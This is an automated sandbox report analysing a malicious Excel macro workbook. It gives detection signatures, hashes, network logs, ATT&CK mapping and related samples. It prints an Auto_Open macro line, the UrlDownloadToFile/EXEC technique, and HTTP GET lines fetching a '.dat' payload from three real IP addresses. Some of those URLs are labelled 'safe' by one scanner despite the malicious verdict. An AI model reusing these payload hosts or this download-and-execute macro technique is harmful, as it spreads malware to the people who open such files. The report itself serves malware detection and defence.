Loading ...

Play interactive tourEdit tour

Analysis Report Copy-384955799-05102021.xlsm

Overview

General Information

Sample Name:Copy-384955799-05102021.xlsm
Analysis ID:412131
MD5:3a3aae5975bd4a5512cfea2a4a5991a6
SHA1:4ff9eafa51cdd8d979ef68dc8d0aa9ebb6168e20
SHA256:bba463e9f1b1044f7d3b09fe0d696ebb57b1668a1fc025363731c6aefac112bd
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malicious Excel 4.0 Macro
Multi AV Scanner detection for submitted file
Yara detected Obfuscated Macro In XLSM
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Found malicious URLs in unpacked macro 4.0 sheet
Allocates a big amount of memory (probably used for heap spraying)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2072 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
sheet2.xmlJoeSecurity_ObfuscatedMacroInXLSMYara detected Obfuscated Macro In XLSMJoe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: Copy-384955799-05102021.xlsmReversingLabs: Detection: 29%
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Source: excel.exeMemory has grown: Private usage: 4MB later: 35MB
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.14.31.59:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.14.31.59:80

    Networking:

    barindex
    Found malicious URLs in unpacked macro 4.0 sheetShow sources
    Source: before.4.91.29.sheet.csv_unpackMacro 4.0 Deobfuscator: http://185.14.31.59/
    Source: Joe Sandbox ViewIP Address: 45.138.157.63 45.138.157.63
    Source: Joe Sandbox ViewIP Address: 185.14.31.59 185.14.31.59
    Source: Joe Sandbox ViewIP Address: 167.114.48.59 167.114.48.59
    Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.14.31.59Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.138.157.63Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 167.114.48.59Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 185.14.31.59
    Source: unknownTCP traffic detected without corresponding DNS query: 185.14.31.59
    Source: unknownTCP traffic detected without corresponding DNS query: 185.14.31.59
    Source: unknownTCP traffic detected without corresponding DNS query: 185.14.31.59
    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.157.63
    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.157.63
    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.157.63
    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.157.63
    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.48.59
    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.48.59
    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.48.59
    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.48.59
    Source: unknownTCP traffic detected without corresponding DNS query: 185.14.31.59
    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.157.63
    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.48.59
    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.48.59
    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.157.63
    Source: unknownTCP traffic detected without corresponding DNS query: 185.14.31.59
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\54C4058B.jpgJump to behavior
    Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.14.31.59Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.138.157.63Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 167.114.48.59Connection: Keep-Alive
    Source: before.4.91.29.sheet.csv_unpackString found in binary or memory: http://185.14.31.59/

    System Summary:

    barindex
    Found malicious Excel 4.0 MacroShow sources
    Source: Copy-384955799-05102021.xlsmInitial sample: urlmon
    Source: Copy-384955799-05102021.xlsmInitial sample: urlmon
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: Copy-384955799-05102021.xlsmInitial sample: EXEC
    Source: Copy-384955799-05102021.xlsmOLE, VBA macro line: Private Sub Auto_Open()
    Source: Copy-384955799-05102021.xlsmOLE indicator, VBA macros: true
    Source: classification engineClassification label: mal76.expl.evad.winXLSM@1/7@0/3
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Copy-384955799-05102021.xlsmJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD45E.tmpJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: Copy-384955799-05102021.xlsmReversingLabs: Detection: 29%
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Copy-384955799-05102021.xlsmInitial sample: OLE zip file path = xl/media/image1.jpg
    Source: Copy-384955799-05102021.xlsmInitial sample: OLE zip file path = xl/drawings/drawing2.xml
    Source: Copy-384955799-05102021.xlsmInitial sample: OLE zip file path = xl/drawings/drawing3.xml
    Source: Copy-384955799-05102021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
    Source: Copy-384955799-05102021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels
    Source: Copy-384955799-05102021.xlsmInitial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels
    Source: Copy-384955799-05102021.xlsmInitial sample: OLE zip file path = xl/drawings/_rels/drawing3.xml.rels
    Source: Copy-384955799-05102021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

    Data Obfuscation:

    barindex
    Yara detected Obfuscated Macro In XLSMShow sources
    Source: Yara matchFile source: sheet2.xml, type: SAMPLE
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting22Path InterceptionExtra Window Memory Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsScripting22LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Extra Window Memory Injection1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Copy-384955799-05102021.xlsm30%ReversingLabsDocument-Office.Trojan.Valyria

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://45.138.157.63/44313,6048108796.dat0%Avira URL Cloudsafe
    http://167.114.48.59/44313,6048108796.dat0%Avira URL Cloudsafe
    http://185.14.31.59/44313,6048108796.dat0%Avira URL Cloudsafe
    http://185.14.31.59/0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://45.138.157.63/44313,6048108796.datfalse
    • Avira URL Cloud: safe
    unknown
    http://167.114.48.59/44313,6048108796.datfalse
    • Avira URL Cloud: safe
    unknown
    http://185.14.31.59/44313,6048108796.dattrue
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://185.14.31.59/before.4.91.29.sheet.csv_unpacktrue
    • Avira URL Cloud: safe
    unknown

    Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public

    IPDomainCountryFlagASNASN NameMalicious
    45.138.157.63
    unknownRussian Federation
    44094WEBHOST1-ASRUfalse
    185.14.31.59
    unknownUkraine
    21100ITLDC-NLUAfalse
    167.114.48.59
    unknownCanada
    16276OVHFRfalse

    General Information

    Joe Sandbox Version:32.0.0 Black Diamond
    Analysis ID:412131
    Start date:12.05.2021
    Start time:12:42:51
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 4m 42s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:Copy-384955799-05102021.xlsm
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Run name:Without Instrumentation
    Number of analysed new started processes analysed:4
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal76.expl.evad.winXLSM@1/7@0/3
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .xlsm
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    45.138.157.63Copy-384955799-05102021.xlsmGet hashmaliciousBrowse
    • 45.138.157.63/44313,6048108796.dat
    Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 45.138.157.63/44313,6048108796.dat
    Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 45.138.157.63/44313,6048108796.dat
    Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 45.138.157.63/44313,6048108796.dat
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 45.138.157.63/44313,6048108796.dat
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 45.138.157.63/44313,6048108796.dat
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 45.138.157.63/44313,6048108796.dat
    185.14.31.59Copy-384955799-05102021.xlsmGet hashmaliciousBrowse
    • 185.14.31.59/44313,6048108796.dat
    Copy-384955799-05102021.xlsmGet hashmaliciousBrowse
    • 185.14.31.59/44313,6048108796.dat
    Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 185.14.31.59/44313,6048108796.dat
    Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 185.14.31.59/44313,6048108796.dat
    Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 185.14.31.59/44313,6048108796.dat
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 185.14.31.59/44313,6048108796.dat
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 185.14.31.59/44313,6048108796.dat
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 185.14.31.59/44313,6048108796.dat
    167.114.48.59Copy-384955799-05102021.xlsmGet hashmaliciousBrowse
    • 167.114.48.59/44313,6048108796.dat
    Copy-384955799-05102021.xlsmGet hashmaliciousBrowse
    • 167.114.48.59/44313,6048108796.dat
    Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 167.114.48.59/44313,6048108796.dat
    Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 167.114.48.59/44313,6048108796.dat
    Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 167.114.48.59/44313,6048108796.dat
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 167.114.48.59/44313,6048108796.dat
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 167.114.48.59/44313,6048108796.dat
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 167.114.48.59/44313,6048108796.dat

    Domains

    No context

    ASN

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    WEBHOST1-ASRUCopy-384955799-05102021.xlsmGet hashmaliciousBrowse
    • 45.138.157.63
    Copy-384955799-05102021.xlsmGet hashmaliciousBrowse
    • 45.138.157.63
    f29046900fd4550e404656f9638540fc1d0ad90facbbe.exeGet hashmaliciousBrowse
    • 45.67.230.22
    3510495740-05102021.xlsmGet hashmaliciousBrowse
    • 45.67.230.159
    3510495740-05102021.xlsmGet hashmaliciousBrowse
    • 45.67.230.159
    3510495740-05102021.xlsmGet hashmaliciousBrowse
    • 45.67.230.159
    Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 45.138.157.63
    Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 45.138.157.63
    Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 45.138.157.63
    520b670d_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 45.67.230.159
    520b670d_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 45.67.230.159
    520b670d_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 45.67.230.159
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 45.138.157.63
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 45.138.157.63
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 45.138.157.63
    15d3f15f_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 45.138.157.43
    15d3f15f_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 45.138.157.43
    15d3f15f_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 45.138.157.43
    7f8b3a9a_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 45.138.157.43
    7f8b3a9a_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 45.138.157.43
    OVHFRCopy-384955799-05102021.xlsmGet hashmaliciousBrowse
    • 167.114.48.59
    Copy-384955799-05102021.xlsmGet hashmaliciousBrowse
    • 167.114.48.59
    DHL_Shipment11052021pdf.exeGet hashmaliciousBrowse
    • 51.210.201.99
    A6FAm1ae1j.exeGet hashmaliciousBrowse
    • 217.182.77.10
    INV74321.exeGet hashmaliciousBrowse
    • 87.98.148.38
    aa04cdcc_by_Libranalysis.exeGet hashmaliciousBrowse
    • 46.105.217.100
    correct invoice.exeGet hashmaliciousBrowse
    • 213.186.33.5
    Kb0p7FYmN0yNdzP.exeGet hashmaliciousBrowse
    • 66.70.204.222
    551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 193.70.33.51
    guluh4pYFQybxL8.exeGet hashmaliciousBrowse
    • 66.70.204.222
    qA9D8QVC4LrzlPR.exeGet hashmaliciousBrowse
    • 66.70.204.222
    OLy4KI85kB3HENF.exeGet hashmaliciousBrowse
    • 66.70.204.222
    generated purchase order 6149057.xlsmGet hashmaliciousBrowse
    • 158.69.48.225
    scan of document 5336227.xlsmGet hashmaliciousBrowse
    • 145.239.93.251
    67w7Ez6lvb.exeGet hashmaliciousBrowse
    • 91.121.251.178
    generated check 8460.xlsmGet hashmaliciousBrowse
    • 145.239.93.251
    export of bill 896621.xlsmGet hashmaliciousBrowse
    • 193.70.33.51
    copy of invoice 4347.xlsmGet hashmaliciousBrowse
    • 145.239.93.251
    scan of invoice 4366307.xlsmGet hashmaliciousBrowse
    • 51.222.42.168
    bill 04050.xlsmGet hashmaliciousBrowse
    • 193.70.33.51
    ITLDC-NLUACopy-384955799-05102021.xlsmGet hashmaliciousBrowse
    • 185.14.31.59
    Copy-384955799-05102021.xlsmGet hashmaliciousBrowse
    • 185.14.31.59
    main_setup_x86x64.exeGet hashmaliciousBrowse
    • 185.154.14.180
    Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 185.14.31.59
    Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 185.14.31.59
    Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 185.14.31.59
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 185.14.31.59
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 185.14.31.59
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 185.14.31.59
    0c69a7ab_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 195.123.220.175
    0c69a7ab_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 195.123.220.175
    0c69a7ab_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 195.123.220.175
    1456787477-05062021.xlsmGet hashmaliciousBrowse
    • 195.123.220.175
    1456787477-05062021.xlsmGet hashmaliciousBrowse
    • 195.123.220.175
    1456787477-05062021.xlsmGet hashmaliciousBrowse
    • 195.123.220.175
    11730679995-05062021.xlsmGet hashmaliciousBrowse
    • 195.123.220.175
    11730679995-05062021.xlsmGet hashmaliciousBrowse
    • 195.123.220.175
    11730679995-05062021.xlsmGet hashmaliciousBrowse
    • 195.123.220.175
    eda41d18_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 195.123.220.175
    eda41d18_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 195.123.220.175

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\54C4058B.jpg
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:[TIFF image data, big-endian, direntries=5], baseline, precision 8, 1080x1080, frames 3
    Category:dropped
    Size (bytes):92379
    Entropy (8bit):7.654577060340879
    Encrypted:false
    SSDEEP:1536:1o1vutINbjOXGw548LBkVb/oyrKXkX89DcO9GQSnIv+C1EDFVxkR7Y90:wvKINbjvw548LMb/oqKO8NnS8+60Kc0
    MD5:4A425E6A5A885C0D0E2589506FD2244B
    SHA1:E23482422480A4720E22F311B42BD65E2F3556F8
    SHA-256:76E685FC2035D8CF19945C6686D82054B64D0A9612853D8F428C4B4FE351C160
    SHA-512:3C827E13A12CC817CBD80EA7C89BEC5288FD21250728E76E00D6355008F704C77EC9BC37C85FF076D8D1F960DB53741F352AB649CD2C754B71B4D11CFFBEEA54
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview: ......JFIF.....`.`.....ZExif..MM.*.................J............Q...........Q...........Q..........................C....................................................................C.......................................................................8.8.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..D.G.\.....i].......k.@U.........B..Hw.A...`p;.RsIRHTs..%G?QU.#..$..."...U.A....g].s......c..,....{W'..M.Nc....F.~..y..l..`.e..a..[...P.y]..k_..CI..z.Ru..s.6.Y....."..1]Q......e#.......~.`sk..KH......p.4.i.j+3{.....N.DS..L.....o..o.5f>..jY.uS...Z.B...UG`)..6D....(.....
    C:\Users\user\AppData\Local\Temp\8DDE0000
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):118882
    Entropy (8bit):7.689597301933395
    Encrypted:false
    SSDEEP:3072:ExFcLmf8gvKINbjvw548LMb/oqKO8NnS8+60KcFffE:wsVAbT648LM7D98Np+ECc
    MD5:AD5A6CB1FA13079B73BB4A84671FEA42
    SHA1:B8318B929DA96A263F31C3F164E265789B84290F
    SHA-256:4E623CD2BB8D30076ADF036CED9D9859A8F4FFBE309C680611B528DFBEBB807E
    SHA-512:C25D84A0EC4FFA84EDF2D99B038E1DEE3832DD5D2627964E0B80A84108303E102D06A1EE1AE60911736F91FED11E2DC86D599347A9D0FDFF32220A6070CD6CB4
    Malicious:false
    Reputation:low
    Preview: .V]o.0.}.....u.M;i.&B...........%...w.(...)..|9..s?.....b.!*g+rA...+.T.....?.OR....Y..."..}.2|\z..F.X.&%...(.0<R..........y.f..v9..`...6.)c...7L..N........%...LU..V.'...V.n2Q...O..i.....@2....1<@J.X$l/g................~.!....p...;q..jN=...;....t....-4{va6vnF...j.X.B..m..".....p.+.....62..tq...)9...I..S..'....t.}...,l.;.}q..S..&....=.?`-LG^1-5.w.........C..~w..cw.?g.l}q~..@=yO......x..pO..}pS..v[.~9+...C6....>....?./...K.@.......#:v......K A..f./..........PK..........!.\..............[Content_Types].xml ...(.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Copy-384955799-05102021.LNK
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed May 12 18:45:42 2021, atime=Wed May 12 18:45:42 2021, length=118890, window=hide
    Category:modified
    Size (bytes):2168
    Entropy (8bit):4.521891994687773
    Encrypted:false
    SSDEEP:48:8vq/XT0jq60Q7148Qh2vq/XT0jq60Q7148Q/:8C/Xojq60Y48Qh2C/Xojq60Y48Q/
    MD5:C6DB1C0F39FCFB99DD32AD58E8643821
    SHA1:380C2D2D52CDF9EC896BEB65DBFC496290A9F34A
    SHA-256:25791614389FC120D9D7962C08A8CF267F529DD8C546025FC743883DFA65A16F
    SHA-512:94E24A6C5CDDDE79DD4B9B164DF37493747768E1CDBB692457B0E5F6841558097EEBBF112BC90E8DB18C055B8F4DE10F38A9BA52F5AEF42F52D010CFAD05A6A5
    Malicious:false
    Reputation:low
    Preview: L..................F.... ...:[o..{..1.fdgG...}pdgG..j............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2./....R.. 